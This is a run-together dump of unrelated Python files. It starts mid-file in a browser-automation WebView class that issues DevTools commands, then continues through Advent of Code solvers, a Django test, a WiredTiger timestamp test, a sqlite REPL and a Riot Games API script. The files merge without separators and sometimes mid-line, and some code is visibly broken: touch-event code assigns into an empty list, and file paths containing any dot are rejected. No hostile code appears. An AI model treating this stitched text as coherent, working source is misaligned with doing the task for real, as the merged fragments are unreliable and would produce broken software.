DevToolsClientImpl, may cause wrong init of DevToolsEventListener if isinstance(client, DevToolsClientImpl): self.dom_tracker = DomTracker(client) self.frame_tracker = FrameTracker(client) self.navigation_tracker = NavigationTracker(client) self.dialog_manager = JavaScriptDialogManager(client) self.geolocation_override_manager = GeolocationOverrideManager(client) self.heap_snapshot_taker = HeapSnapshotTaker(client) #self.debugger = DebuggerTracker(client) else: self.dom_tracker = None self.frame_tracker = None self.navigation_tracker = None self.dialog_manager = None self.geolocation_override_manager = None self.heap_snapshot_taker = None #self.debugger = None def Update(self, other): self.build_no = other.build_no self.client = other.client self.dom_tracker = other.dom_tracker self.frame_tracker = other.frame_tracker self.navigation_tracker = other.navigation_tracker self.dialog_manager = other.dialog_manager self.geolocation_override_manager = other.geolocation_override_manager self.heap_snapshot_taker = other.heap_snapshot_taker #self.debugger = other.debugger # Overridden from WebView: def GetId(self): return self.sid def WasCrashed(self): return self.client.WasCrashed() def ConnectIfNecessary(self): return self.client.ConnectIfNecessary() def HandleReceivedEvents(self): return self.client.HandleReceivedEvents() def Load(self, url): # Javascript URLs will cause a hang while waiting for the page to stop # loading, so just disallow. 
if url.lower().startswith("javascript"): return Status(kUnknownError, "unsupported protocol") params = {} params["url"] = url return self.client.SendCommand("Page.navigate", params) def Reload(self): params = {} params["ignoreCache"] = False return self.client.SendCommand("Page.reload", params) def DispatchTouchEvents(self, events=[]): for it in events: params = {} params["type"] = _GetTouchEventAsString(it.typer) point_list = [] point = {} point["state"] = _GetPointStateString(it.typer) point["x"] = it.x point["y"] = it.y point_list[0] = point params["touchPoints"] = point_list status = self.client.SendCommand("Input.dispatchTouchEvent", params) if status.IsError(): return status return Status(kOk) def DispatchKeyEvents(self, events=[]): for it in events: params = {} params["type"] = _GetKeyEventAsString(it.typer) if it.modifiers & kNumLockKeyModifierMask: params["isKeypad"] = True params["modifiers"] = it.modifiers & (kNumLockKeyModifierMask - 1) else: params["modifiers"] = it.modifiers params["text"] = it.modified_text params["unmodifiedText"] = it.unmodified_text params["nativeVirtualKeyCode"] = it.key_code params["windowsVirtualKeyCode"] = it.key_code status = self.client.SendCommand("Input.dispatchKeyEvent", params) if status.IsError(): return status return Status(kOk) def DispatchMouseEvents(self, events, frame): for it in events: params = {} params["type"] = _GetMouseEventAsString(it.typer) params["x"] = it.x params["y"] = it.y params["modifiers"] = it.modifiers params["button"] = _GetMouseButtonAsString(it.button) params["clickCount"] = it.click_count status = self.client.SendCommand("Input.dispatchMouseEvent", params) if status.IsError(): return status if self.build_no < 1569 and it.button == kRightMouseButton and it.typer == kReleasedMouseEventType: args = [] args.append(it.x) args.append(it.y) args.append(it.modifiers) result = {} status = self.CallFunction(frame, kDispatchContextMenuEventScript, args, result) if status.IsError(): return status return Status(kOk) def GetCookies(self, cookies=[]): params = {} result = {} status = self.client.SendCommandAndGetResult("Page.getCookies", params, result) if status.IsError(): return status cookies_tmp = result.get("cookies") if type(cookies_tmp) != list: return Status(kUnknownError, "DevTools didn't return cookies") cookies[:] = cookies_tmp return Status(kOk) def DeleteCookie(self, name, url): params = {} params["cookieName"] = name params["url"] = url return self.client.SendCommand("Page.deleteCookie", params) def GetJavaScriptDialogManager(self): return self.dialog_manager def OverrideGeolocation(self, geoposition): return self.geolocation_override_manager.OverrideGeolocation(geoposition) def EvaluateScript(self, frame, expression, result): (status, context_id) = _GetContextIdForFrame(self.frame_tracker, frame) if status.IsError(): return status return _EvaluateScriptAndGetValue(self.client, context_id, expression, result) def CallFunction(self, frame, function, args, result): try: js = json.dumps(args) except: return Status(kUnknownError) # TODO(wyh): Second null should be array of shadow host ids. 
expression = "(%s).apply(null, [null, %s, %s])" % (kCallFunctionScript, function, js) temp_result = {} status = self.EvaluateScript(frame, expression, temp_result) if status.IsError(): return status return _ParseCallFunctionResult(temp_result, result) def CallAsyncFunctionInternal(self, frame, function, args, is_user_supplied, timeout, result): async_args = [] async_args.append("return (" + function + ").apply(null, arguments);") async_args.extend(args) async_args.append(is_user_supplied) # timeout should be in milliseconds async_args.append(timeout) tmp = {} status = self.CallFunction(frame, kExecuteAsyncScriptScript, async_args, tmp) if status.IsError(): return status kDocUnloadError = "document unloaded while waiting for result" kQueryResult = "function() {\ var info = document.$xwalk_asyncScriptInfo;\ if (!info)\ return {status: %d, value: '%s'};\ var result = info.result;\ if (!result)\ return {status: 0};\ delete info.result;\ return result;\ }" % (kJavaScriptError, kDocUnloadError) while True: no_args = [] query_value = {} status = self.CallFunction(frame, kQueryResult, no_args, query_value) if status.IsError(): if status.Code() == kNoSuchFrame: return Status(kJavaScriptError, kDocUnloadError) return status if type(query_value) != dict: return Status(kUnknownError, "async result info is not a dictionary") status_code = query_value.get("status", None) if type(status_code) != int: return Status(kUnknownError, "async result info has no int 'status'") if status_code != kOk: return Status(status_code, str(query_value.get("value"))) if query_value.has_key("value"): result.clear() result.update(query_value["value"]) return Status(kOk) time.sleep(0.1) def CallAsyncFunction(self, frame, function, args, timeout, result): return self.CallAsyncFunctionInternal(frame, function, args, False, timeout, result) def CallUserAsyncFunction(self, frame, function, args, timeout, result): return self.CallAsyncFunctionInternal(frame, function, args, True, timeout, result) # return status and is_not_pending def IsNotPendingNavigation(self, frame_id): (status, is_pending) = self.navigation_tracker.IsPendingNavigation(frame_id) if status.IsError(): return (status, True) if is_pending and self.dialog_manager.IsDialogOpen(): return (Status(kUnexpectedAlertOpen), False) is_not_pending = not is_pending return (Status(kOk), is_not_pending) # return status and is_pending def IsPendingNavigation(self, frame_id): return self.navigation_tracker.IsPendingNavigation(frame_id) def WaitForPendingNavigations(self, frame_id, timeout, stop_load_on_timeout): VLOG(0, "Waiting for pending navigations...") status = self.client.HandleEventsUntil(Bind(self.IsNotPendingNavigation, [frame_id]), timeout) if status.Code() == kTimeout and stop_load_on_timeout: VLOG(0, "Timed out. 
Stopping navigation...") unused_value = {} self.EvaluateScript("", "window.stop();", unused_value) new_status = self.client.HandleEventsUntil(Bind(self.IsNotPendingNavigation, [frame_id]), 10) if new_status.IsError(): status = new_status VLOG(0, "Done waiting for pending navigations") return status def TakeHeapSnapshot(self): return self.heap_snapshot_taker.TakeHeapSnapshot() # return status and out_frame def GetFrameByFunction(self, frame, function, args): (status, context_id) = _GetContextIdForFrame(self.frame_tracker, frame) if status.IsError(): return status found_node = False node_id = -1 (status, found_node, node_id) = _GetNodeIdFromFunction(self.client, context_id, function, args) if status.IsError(): return status if not found_node: return Status(kNoSuchFrame) return self.dom_tracker.GetFrameIdForNode(node_id) def SetFileInputFiles(self, frame, element, files): file_list = [] for i in files: if not i.startswith("/"): return Status(kUnknownError, "path is not absolute: " + i) if i.find(".") != -1: return Status(kUnknownError, "path is not canonical: " + i) file_list.append(i) (status, context_id) = _GetContextIdForFrame(self.frame_tracker, frame) if status.IsError(): return status args = [] args.append(copy.deepcopy(element)) (status, found_node, node_id) = _GetNodeIdFromFunction(self.client, context_id, "function(element) { return element; }", args) if status.IsError(): return status if not found_node: return Status(kUnknownError, "no node ID for file input") params = {} params["nodeId"] = node_id params["files"] = file_list return self.client.SendCommand("DOM.setFileInputFiles", params) # return status and screenshot def CaptureScreenshot(self): result = {} status = self.client.SendCommandAndGetResult("Page.captureScreenshot", {}, result) if status.IsError(): return (status, "") screenshot = result.get("data") if type(screenshot) != str: return (Status(kUnknownError, "expected string 'data' in response"), "") return (Status(kOk), screenshot) """Falcon benchmarks""" from .bench import main # NOQA docker run -it falconry/falcon-bench:pypy3from invoke import task @task def hello(ctx): "Say hello" print('Hello!') from django.contrib.auth import get_user_model from django.urls import reverse from tests.base.mixins import ProductTestUtils from tests.base.tests import ShopUserTestCase UserModel = get_user_model() class ShowBoughtProductsPageTest(ProductTestUtils, ShopUserTestCase): def test_showBoughtProducts(self): self.client.force_login(self.user) response = self.client.get(reverse('bought_products')) self.assertEqual(200, response.status_code) import Advent_of_code2020 as aoc def format_seats(seats): seat_grid = [] for idx, seat_line in enumerate(seats): seat_line = seat_line.replace("\n", "") seat_grid.append([]) for seat in seat_line: seat_grid[idx].append(seat) return seat_grid def get_range(min, maks, pos): offset = 1 if pos <= min : start = pos else: start = pos - offset if pos >= maks : stop = pos else: stop = pos + offset return start, stop def getSeats_Dim(seats): rows = len(seats) cols = len(seats[0]) return rows, cols def copy_seats(seats): seats_rows, seats_cols = getSeats_Dim(seats) new_seats = [["." 
for i in range(seats_cols)] for j in range(seats_rows)] return new_seats def check_adjecent_seats(seats, pos_x, pos_y): number_of_ocupied_seats = 0 seats_rows, seats_cols = getSeats_Dim(seats) x_start, x_stop = get_range(0,seats_cols, pos_x) y_start, y_stop = get_range(0,seats_rows, pos_y) for x in range(seats_rows): for y in range(seats_cols): if x >= x_start and x <= x_stop: if y >= y_start and y <= y_stop: if x == pos_x and y == pos_y: #print("S", end="") pass else: if seats[x][y] == "#": number_of_ocupied_seats += 1 #print(seats[x][y], end= "") #print() return number_of_ocupied_seats def new_seatLayout(seats): new_seats = copy_seats(seats) seats_changed = False for pos_x,seat_row in enumerate(seats): for pos_y, seat in enumerate(seat_row): number_of_ocupied_seats = check_adjecent_seats(seats,pos_x,pos_y) if seat == "L" and number_of_ocupied_seats == 0: new_seats[pos_x][pos_y] = "#" seats_changed = True elif seat == "#" and number_of_ocupied_seats >= 4: new_seats[pos_x][pos_y] = "L"#str(number_of_ocupied_seats)# seats_changed = True else: new_seats[pos_x][pos_y] = seat #print("=", pos_x,pos_y, seat, new_seats[pos_x][pos_y], number_of_ocupied_seats) return new_seats, seats_changed def print_seats(seats): str = "" for seat_row in seats: print(str.join(seat_row)) print() def count_seats(seats): count = 0 for seat_row in seats: for seat in seat_row: if seat == "#": count+=1 return count def solve(): seats = aoc.importFile("11122020.txt") seat_grid = format_seats(seats) iteration = 0 while(True): iteration += 1 #print_seats(seat_grid) new_seat_grid,seat_changed = new_seatLayout(seat_grid) if seat_changed: seat_grid = new_seat_grid else: break print(iteration) print(count_seats(new_seat_grid)) if __name__ == "__main__": solve()from setuptools import setup, find_packages install_requires = [ "matplotlib", "PyYAML", "beautifulsoup4", "lxml", "click", "mako", "xlsxwriter", "openpyxl", ] dev_requires = [ "pytest", "pytest-cov", "sphinx", ] setup( name="tutor-planner", version="1.0", packages=find_packages(), include_package_data=True, install_requires=install_requires, extras_require={ "dev": dev_requires, }, entry_points={ "console_scripts": [ "tutor-planner = tutorplanner.__main__:cli", ], }, ) 00-hello.py print '\nHello, World!' myName = raw_input('What is your name? 
') print 'It is nice to meet you, ' + myName + '\n' NCBI-Hackathons/PlantContam1-10 import sys import random # Substitute a given nucleotide with another # Parameters: bp (string) # Output: new basepair (string) def replace_basepair(bp): nucleotides = ['A', 'T', 'C', 'G'] if bp in nucleotides: nucleotides.remove(bp) return nucleotides[random.randint(0, 2)] else: return bp # Randomly switch nucleotides in a sequence with stated frequency # Parameters: sequence (string), swapFreq (int) # Output: new sequence (string) def insert_swaps(sequence, swapFreq): sequence = sequence.upper() swaps = int(len(sequence)*swapFreq) indices = random.sample(range(0, len(sequence) - 1), swaps) for i in indices: nucleotides = list(sequence) nucleotides[i] = replace_basepair(nucleotides[i]) sequence = ''.join(nucleotides) return sequence #!/usr/bin/python3 import copy from os import device_encoding from typing import DefaultDict, List import sys from collections import defaultdict import heapq lines = open(sys.argv[1] if len(sys.argv) > 1 else "day18.dat", "r").read().splitlines() gcounter = 0 def recount(vals, firstcall = True): global gcounter ret = [] if firstcall == True: gcounter = 0 for v in vals: if type(v) == list: ret.append(recount(v, False)) else: v2 = (v[0], gcounter) ret.append(v2) gcounter += 1 return ret def processLine(line, firstcall = True): val = [] offset = -1 for i, v in enumerate(line): if offset < 0: tmp = [] if v in ["[", "]", ","]: if v in ["["]: offset, V = processLine(line[i+1:], False) val.append(V) if v in ["]"]: #print("Return", i, val) return i+1, val else: val.append((int(v), 0)) else: offset -= 1 if offset == 0: offset = -1 if firstcall == True: val = recount(val) return val return i, val exploded = None level = 0 def findExploded(L, firstcall = True): global level, exploded ret = [] if firstcall: exploded = None level = -1 level += 1 if level == 4 and exploded == None: if type(L[0]) == list: exploded = L[0] ret.append((0, None)) ret.append(L[1]) elif type(L[1]) == list: exploded = L[1] ret.append(L[0]) ret.append((0, None)) else: ret = L else: for l in L: if type(l) == list: v = findExploded(l, False) ret.append(v) else: ret.append(l) level -= 1 return ret replaced = None def replaceAfter(L, v): ret = [] for l in L: if type(l) == list: v2 = replaceAfter(l, v) ret.append(v2) else: if l[1] == v[1] + 1: ret.append((l[0]+v[0], None)) else: ret.append(l) return ret lastFound = 10e9 def findPosBefore(L, v): global lastFound for l in L: if type(l) == list: findPosBefore(l, v) else: print("foo", l, v) if l[1] != None: if l[1] < v[1]: if lastFound == None: lastFound = l[1] elif l[1] > lastFound: lastFound = l[1] return def addingBefore(L, pos, v): ret = [] for l in L: if type(l) == list: ret.append(addingBefore(l, pos, v)) else: if l[1] == pos: ret.append((l[0]+v,l[1])) else: ret.append(l) return ret def replaceBefore(L, v): global lastFound #lastFound = None #findPosBefore(L, v) #if lastFound != None: #print("assert1", L) #print("assert2", v[1], v[0]) L = addingBefore(L, v[1]-1, v[0]) return L def uncount(L): ret = [] for l in L: if type(l) == list: ret.append(uncount(l)) else: ret.append(l[0]) return ret def tostring(L): ret = "[" for i,l in enumerate(L): if i == 1: ret += "," if type(l) == list: ret += tostring(l) else: if type(l) == tuple: ret += str(l[0]) else: ret += str(l) ret += "]" return ret def process(line): L = processLine(line) #print("0", uncount(L)) L = findExploded(L) #print("1", uncount(L)) L = replaceBefore(L, exploded[0]) #print("2", uncount(L)) L = replaceAfter(L, 
exploded[1]) L = recount(L) L = uncount(L) L = tostring(L[0]) #print("Result", L) return L alreadysplit = False def splitme(L, firstcall = True): global alreadysplit if firstcall: alreadysplit = False ret = [] for l in L: if type(l) == list: ret.append(splitme(l, False)) else: if alreadysplit == False: if l[0] >= 10: alreadysplit = True tmp = [] tmp.append((l[0]//2, None)) tmp.append(((l[0]+1)//2, None)) ret.append(tmp) else: ret.append(l) else: ret.append(l) return ret def split(line): L = processLine(line) print("1", tostring(L[0])) L = splitme(L) L = recount(L) print("2", tostring(L[0])) L = tostring(L[0]) return L def reduceme(line): global exploded L = processLine(line) #print("Reducing......", tostring(L[0])) L2 = None while L2 != tostring(L[0]): L2 = tostring(L[0]) #print("0", uncount(L)) explodeagain = True while explodeagain: explodeagain = False beExp = tostring(L[0]) L = findExploded(L) if exploded != None: #print("Before Explode", beExp, "explode", exploded[0][0], exploded[1][0]) explodeagain = True #print("1", uncount(L)) L = replaceBefore(L, exploded[0]) #print("2", uncount(L)) L = replaceAfter(L, exploded[1]) L = recount(L) #print("After Explode", tostring(L[0])) L = splitme(L) L = recount(L) L = uncount(L) L = tostring(L[0]) #print("Result", L) return L assert(process("[[[[[9,8],1],2],3],4]") == "[[[[0,9],2],3],4]") assert(process("[7,[6,[5,[4,[3,2]]]]]") == "[7,[6,[5,[7,0]]]]") assert(process("[[6,[5,[4,[3,2]]]],1]") == "[[6,[5,[7,0]]],3]") assert(process("[[3,[2,[1,[7,3]]]],[6,[5,[4,[3,2]]]]]") == "[[3,[2,[8,0]]],[9,[5,[4,[3,2]]]]]") assert(process("[[3,[2,[8,0]]],[9,[5,[4,[3,2]]]]]") == "[[3,[2,[8,0]]],[9,[5,[7,0]]]]") assert(reduceme("[[[[[4,3],4],4],[7,[[8,4],9]]],[1,1]]") == "[[[[0,7],4],[[7,8],[6,0]]],[8,1]]") def processMultilines(lines): S = None for l in lines: if S == None: S = l S = reduceme(S) else: l = reduceme(l) S = "[" + S + "," + l + "]" S = reduceme(S) return S def calcMag(L): ret = 0 if type(L[0]) == list: ret += 3 * calcMag(L[0]) else: ret += 3 * L[0][0] if type(L[1]) == list: ret += 2 * calcMag(L[1]) else: ret += 2 * L[1][0] return ret def magnitude(line): L = processLine(line) return calcMag(L[0]) assert(processMultilines(["[1,1]", "[2,2]", "[3,3]", "[4,4]"]) == "[[[[1,1],[2,2]],[3,3]],[4,4]]") assert(processMultilines(["[1,1]", "[2,2]", "[3,3]", "[4,4]", "[5,5]"]) == "[[[[3,0],[5,3]],[4,4]],[5,5]]") assert(processMultilines(["[1,1]", "[2,2]", "[3,3]", "[4,4]", "[5,5]", "[6,6]"]) == "[[[[5,0],[7,4]],[5,5]],[6,6]]") #assert(processMultilines(["[[[0,[4,5]],[0,0]],[[[4,5],[2,6]],[9,5]]]", "[7,[[[3,7],[4,3]],[[6,3],[8,8]]]]"]) == "[[[[4,0],[5,4]],[[7,7],[6,0]]],[[8,[7,7]],[[7,9],[5,0]]]]") assert(magnitude("[[1,2],[[3,4],5]]") == 143) assert(magnitude("[[[[8,7],[7,7]],[[8,6],[7,7]]],[[[0,7],[6,6]],[8,7]]]") == 3488) res = processMultilines(lines) print("Part1", magnitude(res)) p2 = -1000 for i in range(len(lines)): for j in range(len(lines)): if i != j: res = processMultilines((lines[i], lines[j])) p2 = max(p2, magnitude(res)) print("Part2", p2)import pygame # initialize Pygame pygame.init() # Class Button # Creates a Button object class Button(pygame.sprite.Sprite): def __init__(self, screen, x, y, w, h, text): pygame.sprite.Sprite.__init__(self) self.image = pygame.Surface((w, h)) self.image.fill((0, 0, 0)) font = pygame.font.Font(None, 36) buttonText = font.render(text, 1, ((255, 255, 255))) self.image.blit(buttonText, (0, 0)) self.rect = self.image.get_rect() self.rect.x = x self.rect.y = y self.screen = screensqlite.py0 import sqlite3 
print(sqlite3.version) print(sqlite3.sqlite_version) conn = sqlite3.connect("test.db", isolation_level=None) # db 생성(Auto Commit) c = conn.cursor() # 커서 command = "" while command != "exit": command = input(">>") try : c.execute(command) except : print("명령어 실행 오류") print(c.fetchall()) conn.close() #!/usr/bin/env python # # Public Domain 2014-present MongoDB, Inc. # Public Domain 2008-2014 WiredTiger, Inc. # # This is free and unencumbered software released into the public domain. # # Anyone is free to copy, modify, publish, use, compile, sell, or # distribute this software, either in source code form or as a compiled # binary, for any purpose, commercial or non-commercial, and by any # means. # # In jurisdictions that recognize copyright laws, the author or authors # of this software dedicate any and all copyright interest in the # software to the public domain. We make this dedication for the benefit # of the public at large and to the detriment of our heirs and # successors. We intend this dedication to be an overt act of # relinquishment in perpetuity of all present and future rights to this # software under copyright law. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, # EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF # MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. # IN NO EVENT SHALL THE AUTHORS BE LIABLE FOR ANY CLAIM, DAMAGES OR # OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, # ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR # OTHER DEALINGS IN THE SOFTWARE. # # test_timestamp08.py # Timestamps: API # from suite_subprocess import suite_subprocess import wiredtiger, wttest class test_timestamp08(wttest.WiredTigerTestCase, suite_subprocess): tablename = 'test_timestamp08' uri = 'table:' + tablename def test_timestamp_api(self): self.session.create(self.uri, 'key_format=i,value_format=i') c = self.session.open_cursor(self.uri) # Begin by adding some data. self.session.begin_transaction() c[1] = 1 self.session.commit_transaction( 'commit_timestamp=' + self.timestamp_str(1)) # Cannot set a zero timestamp. self.session.begin_transaction() self.assertRaisesWithMessage(wiredtiger.WiredTigerError, lambda: self.session.timestamp_transaction_uint(wiredtiger.WT_TS_TXN_TYPE_COMMIT, 0), '/zero not permitted/') self.assertRaisesWithMessage(wiredtiger.WiredTigerError, lambda: self.session.timestamp_transaction_uint(wiredtiger.WT_TS_TXN_TYPE_READ, 0), '/zero not permitted/') self.session.rollback_transaction() # In a single transaction it is illegal to set a commit timestamp # older than the first commit timestamp used for this transaction. # Check both timestamp_transaction_uint and commit_transaction APIs. 
self.session.begin_transaction() self.session.timestamp_transaction_uint(wiredtiger.WT_TS_TXN_TYPE_COMMIT, 3) c[3] = 3 self.assertRaisesWithMessage(wiredtiger.WiredTigerError, lambda: self.session.timestamp_transaction_uint(wiredtiger.WT_TS_TXN_TYPE_COMMIT, 2), '/older than the first commit timestamp/') self.session.rollback_transaction() # Commit timestamp > Oldest timestamp self.conn.set_timestamp('oldest_timestamp=' + self.timestamp_str(3)) self.session.begin_transaction() self.assertRaisesWithMessage(wiredtiger.WiredTigerError, lambda: self.session.timestamp_transaction_uint(wiredtiger.WT_TS_TXN_TYPE_COMMIT, 2), '/less than the oldest timestamp/') self.session.rollback_transaction() self.session.begin_transaction() c[4] = 4 self.session.commit_transaction( 'commit_timestamp=' + self.timestamp_str(4)) # Commit timestamp > Stable timestamp. # Check both timestamp_transaction and commit_transaction APIs. # Oldest and stable timestamp are set to 5 at the moment. self.conn.set_timestamp('stable_timestamp=' + self.timestamp_str(6)) self.session.begin_transaction() self.assertRaisesWithMessage(wiredtiger.WiredTigerError, lambda: self.session.timestamp_transaction_uint(wiredtiger.WT_TS_TXN_TYPE_COMMIT, 5), '/after the stable timestamp/') self.session.rollback_transaction() # When explicitly set, commit timestamp for a transaction can be earlier # than the commit timestamp of an earlier transaction. self.session.begin_transaction() c[6] = 6 self.session.timestamp_transaction_uint(wiredtiger.WT_TS_TXN_TYPE_COMMIT, 7) self.session.commit_transaction() self.session.begin_transaction() c[8] = 8 self.session.timestamp_transaction_uint(wiredtiger.WT_TS_TXN_TYPE_COMMIT, 8) self.session.commit_transaction() self.session.begin_transaction() c[7] = 7 self.session.timestamp_transaction_uint(wiredtiger.WT_TS_TXN_TYPE_COMMIT, 7) self.session.commit_transaction() # Read timestamp >= oldest timestamp self.conn.set_timestamp('oldest_timestamp=' + self.timestamp_str(7) + ',stable_timestamp=' + self.timestamp_str(7)) if wiredtiger.standalone_build(): self.assertRaisesException(wiredtiger.WiredTigerError, lambda: self.session.begin_transaction('read_timestamp=' + self.timestamp_str(6))) else: # This is a MongoDB message, not written in standalone builds. with self.expectedStdoutPattern('less than the oldest timestamp'): self.assertRaisesException(wiredtiger.WiredTigerError, lambda: self.session.begin_transaction('read_timestamp=' + self.timestamp_str(6))) # c[8] is not visible at read_timestamp < 8 self.session.begin_transaction() self.session.timestamp_transaction_uint(wiredtiger.WT_TS_TXN_TYPE_READ, 7) self.assertEqual(c[6], 6) self.assertEqual(c[7], 7) c.set_key(8) self.assertEqual(c.search(), wiredtiger.WT_NOTFOUND) self.session.commit_transaction() self.session.begin_transaction() self.session.timestamp_transaction_uint(wiredtiger.WT_TS_TXN_TYPE_READ, 8) self.assertEqual(c[6], 6) self.assertEqual(c[7], 7) self.assertEqual(c[8], 8) self.assertTimestampsEqual( self.conn.query_timestamp('get=oldest_reader'), self.timestamp_str(8)) self.session.commit_transaction() # We can move the oldest timestamp backwards with "force" self.conn.set_timestamp('oldest_timestamp=' + self.timestamp_str(5) + ',force') if wiredtiger.standalone_build(): self.session.begin_transaction() self.assertRaisesException(wiredtiger.WiredTigerError, lambda: self.session.timestamp_transaction_uint(wiredtiger.WT_TS_TXN_TYPE_READ, 4)) else: # This is a MongoDB message, not written in standalone builds. 
self.session.begin_transaction() with self.expectedStdoutPattern('less than the oldest timestamp'): self.assertRaisesException(wiredtiger.WiredTigerError, lambda: self.session.timestamp_transaction_uint(wiredtiger.WT_TS_TXN_TYPE_READ, 4)) self.session.rollback_transaction() self.session.begin_transaction() self.session.timestamp_transaction_uint(wiredtiger.WT_TS_TXN_TYPE_READ, 6) self.assertTimestampsEqual( self.conn.query_timestamp('get=oldest_reader'), self.timestamp_str(6)) self.session.commit_transaction() def test_all_durable(self): self.session.create(self.uri, 'key_format=i,value_format=i') cur1 = self.session.open_cursor(self.uri) # Since this is a non-prepared transaction, we'll be using the commit # timestamp when calculating all_durable since it's implied that they're # the same thing. self.session.begin_transaction() cur1[1] = 1 self.session.timestamp_transaction_uint(wiredtiger.WT_TS_TXN_TYPE_COMMIT, 3) self.session.commit_transaction() self.assertTimestampsEqual( self.conn.query_timestamp('get=all_durable'), '3') # We have a running transaction with a lower commit_timestamp than we've # seen before. So all_durable should return (lowest commit timestamp - 1). self.session.begin_transaction() cur1[2] = 2 self.session.timestamp_transaction_uint(wiredtiger.WT_TS_TXN_TYPE_COMMIT, 2) self.assertTimestampsEqual( self.conn.query_timestamp('get=all_durable'), '1') self.session.commit_transaction() # After committing, go back to the value we saw previously. self.assertTimestampsEqual( self.conn.query_timestamp('get=all_durable'), '3') # For prepared transactions, we take into account the durable timestamp # when calculating all_durable. self.session.begin_transaction() cur1[3] = 3 self.session.timestamp_transaction_uint(wiredtiger.WT_TS_TXN_TYPE_PREPARE, 6) self.session.prepare_transaction() # If we have a commit timestamp for a prepared transaction, then we # don't want that to be visible in the all_durable calculation. self.session.timestamp_transaction_uint(wiredtiger.WT_TS_TXN_TYPE_COMMIT, 7) self.assertTimestampsEqual( self.conn.query_timestamp('get=all_durable'), '3') # Now take into account the durable timestamp. self.session.timestamp_transaction_uint(wiredtiger.WT_TS_TXN_TYPE_DURABLE, 8) self.session.commit_transaction() self.assertTimestampsEqual( self.conn.query_timestamp('get=all_durable'), '8') # All durable moves back when we have a running prepared transaction # with a lower durable timestamp than has previously been committed. self.session.begin_transaction() cur1[4] = 4 self.session.timestamp_transaction_uint(wiredtiger.WT_TS_TXN_TYPE_PREPARE, 3) self.session.prepare_transaction() # If we have a commit timestamp for a prepared transaction, then we # don't want that to be visible in the all_durable calculation. self.session.timestamp_transaction_uint(wiredtiger.WT_TS_TXN_TYPE_COMMIT, 4) self.assertTimestampsEqual( self.conn.query_timestamp('get=all_durable'), '8') # Now take into account the durable timestamp. self.session.timestamp_transaction_uint(wiredtiger.WT_TS_TXN_TYPE_DURABLE, 5) self.assertTimestampsEqual( self.conn.query_timestamp('get=all_durable'), '4') self.session.commit_transaction() self.assertTimestampsEqual( self.conn.query_timestamp('get=all_durable'), '8') # Now test a scenario with multiple commit timestamps for a single txn. 
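# --- Illustrative aside (not taken from the WiredTiger sources) --------------
# A minimal model of the all_durable behaviour exercised next, using plain
# integers instead of the connection API. Assumption: non-prepared
# transactions, where the commit timestamp doubles as the durable timestamp;
# model_all_durable is a hypothetical helper for illustration only.
def model_all_durable(max_committed_durable_ts, running_first_commit_ts=None):
    """all_durable is held back to (first commit ts - 1) of a running txn."""
    if running_first_commit_ts is None:
        return max_committed_durable_ts
    return min(max_committed_durable_ts, running_first_commit_ts - 1)

# model_all_durable(8)                               # 8, nothing running
# model_all_durable(8, running_first_commit_ts=6)    # 5, as queried below
# Setting a second, later commit timestamp on the same running transaction
# does not move the value: only the first commit timestamp is considered.
# ------------------------------------------------------------------------------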
self.session.begin_transaction() cur1[5] = 5 self.session.timestamp_transaction_uint(wiredtiger.WT_TS_TXN_TYPE_COMMIT, 6) self.assertTimestampsEqual( self.conn.query_timestamp('get=all_durable'), '5') # Make more changes and set a new commit timestamp. # Our calculation should use the first commit timestamp so there should # be no observable difference to the all_durable value. cur1[6] = 6 self.session.timestamp_transaction_uint(wiredtiger.WT_TS_TXN_TYPE_COMMIT, 7) self.assertTimestampsEqual( self.conn.query_timestamp('get=all_durable'), '5') # Once committed, we go back to 8. self.session.commit_transaction() self.assertTimestampsEqual( self.conn.query_timestamp('get=all_durable'), '8') if __name__ == '__main__': wttest.run() 0 import requests import json """ This is a very simple wrapper script for Riot Games' API. Here I will demonstrate how to gather a specific match information for a specific user. If you'd like to run this yourself, just make sure to pip install requests and create an account with Riot Games, it's a quick process. Their API client can be found here https://developer.riotgames.com/ """ API_KEY = "" # Going to use my friend's account for the data summoner_name = "TinyKittens" # Yeah their in game name is TinyKittens :) # We use the following endpoint with an API key # to get the summoner's data, more specifically # Their PUUID which is used to query for their # match history summoner_url = f"https://na1.api.riotgames.com/lol/summoner/v4/summoners/by-name/{summoner_name}?api_key={API_KEY}" summoner_response = requests.get(summoner_url) summoner_data = summoner_response.json() # The reponse is returned in json format, # from which I can extract a "puuid" to then # find the summoner's match list summoner_puuid = summoner_data["puuid"] # For simplicity's sake we'll only retrieve # one of their matches. match_list_url = f"https://americas.api.riotgames.com/lol/match/v5/matches/by-puuid/{summoner_puuid}/ids?start=0&count=1&api_key={API_KEY}" match_list_response = requests.get(match_list_url) match_list_data = match_list_response.json() match_id = match_list_data[0] # Now that we have a match_id, let's see # what kind of data we can obtain from it! match_timeline_url = f"https://americas.api.riotgames.com/lol/match/v5/matches/{match_id}/timeline?api_key={API_KEY}" match_timeline_reponse = requests.get(match_timeline_url) match_timeline = match_timeline_reponse.json() # Okay we have an entire json full of details # from the match. Let's see what's in it print(match_timeline.keys()) # dict_keys(['metadata', 'info']) # Okay so we have the json's metadata and info. # Let's see what we can find in the info tab match_info = match_timeline["info"] print(match_info.keys()) match_frames = match_info["frames"] print(len(match_frames)) for frame in match_frames: print(frame.keys()) # It seems that the match information is broken down # into frames. We have 17 of these intervals. Let's # now see what an interval looks like. I will output the # info from this interval into a .json file, since I now # it's a lot of data. frame = match_frames[7] frame_1 = frame['participantFrames'] event_list1 = frame['events'] with open("frame_interval.json", "w") as file: json.dump(frame_1, file) # If we now look at the file frame_interval.json, we can # see all the data that just 1 frame out of the 17 looks # like. We can also obtain ALL sorts of data from this, # including even a player position on the map! 
